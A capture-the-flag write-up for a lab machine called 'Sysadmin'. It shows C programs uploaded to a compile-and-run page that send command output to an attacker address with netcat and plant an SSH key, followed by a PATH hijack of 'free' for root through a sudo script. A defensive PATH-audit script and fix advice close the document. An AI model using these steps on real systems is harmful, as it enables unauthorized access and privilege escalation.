Sysadmin

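Visiting the target shows an upload page that compiles and runs C source files. A comment in the page's HTML source gives the command used for compilation.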

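The command shows that linking against external libraries is disabled, so to use the system function you have to declare it yourself. After a few quick attempts it turned out that many common commands are missing, but busybox is available. First, get the current username: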

int system(const char *command);
int main() {
    system("echo $(whoami) | busybox nc 192.168.56.1 23333");
    return 0;
}

Next, write a public key onto the target: start a web server locally and fetch the key with wget.

int system(const char *command);
int main() {
    system("mkdir -p ~/.ssh && touch ~/.ssh/authorized_keys && busybox wget 192.168.56.1:8000/id_rsa.pub -O ~/.ssh/authorized_keys");
    return 0;
}

Then connect directly over ssh and get the regular user's flag.

sudo -l shows that a script has been granted sudo privileges.

Hijacking the free command escalates privileges, and the root flag can be read.

echo@Sysadmin:~$ echo 'ls /root' > /tmp/free
echo@Sysadmin:~$ chmod +x /tmp/free
echo@Sysadmin:~$ export PATH="/tmp:$PATH"
echo@Sysadmin:~$ sudo /usr/local/bin/system-info.sh
Starting daily system information collection at Fri 31 Oct 2025 04:57:54 AM EDT
------------------------------------------------------

(omitted here)

root.txt
------------------------------------------------------
Report complete at Fri 31 Oct 2025 04:57:54 AM EDT
echo@Sysadmin:~$ echo 'cat /root/root.txt'>/tmp/free
echo@Sysadmin:~$ sudo /usr/local/bin/system-info.sh
Starting daily system information collection at Fri 31 Oct 2025 04:58:25 AM EDT
------------------------------------------------------

(omitted here)

flag{root-8b8a8b353298f798e3eb8628661617b6}
------------------------------------------------------
Report complete at Fri 31 Oct 2025 04:58:25 AM EDT
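
The hijack above works because the sudo-allowed script calls free by bare name and the caller's PATH is searched in order. The following check is an added example, not part of the original writeup or the target's script: the function name audit_cmd_path and its output format are hypothetical. It walks a PATH string the way the shell would and flags every relative or world-writable directory that is searched before the command resolves.

```shell
#!/bin/sh
# Added example: audit how a bare command name resolves through PATH.
# Usage: audit_cmd_path NAME [PATH_STRING]   (PATH_STRING defaults to $PATH)
# Exit status: 0 = resolves through safe directories only,
#              1 = a risky directory is searched before or at the match,
#              2 = NAME not found at all.
audit_cmd_path() (
    name=$1
    search=${2-$PATH}
    risky=0
    IFS=:
    set -f                       # no globbing while splitting PATH
    for dir in $search; do
        case $dir in
            /*) ;;
            *)  # empty or relative entry means "wherever the caller stands"
                echo "RISK relative-entry:${dir:-<empty>}"
                risky=1
                continue ;;
        esac
        [ -d "$dir" ] || continue
        # "$dir/." makes find test the directory itself, even via a symlink.
        # World-writable (like /tmp): any local user can plant NAME here.
        if [ -n "$(find "$dir/." -prune -perm -0002 -print 2>/dev/null)" ]; then
            echo "RISK world-writable:$dir"
            risky=1
        fi
        # First executable match wins; later directories are never searched.
        if [ -x "$dir/$name" ] && [ ! -d "$dir/$name" ]; then
            echo "RESOLVES $dir/$name"
            exit "$risky"
        fi
    done
    echo "UNRESOLVED $name"
    exit 2
)

# Stand-alone run: audit "free" (or the name given as $1) against this PATH.
audit_cmd_path "${1:-free}" || true
```

On the script side, the fix is to call binaries by absolute path or set PATH at the top of the script; on the sudo side, a `Defaults secure_path=...` line in sudoers replaces the caller's PATH for commands run through sudo.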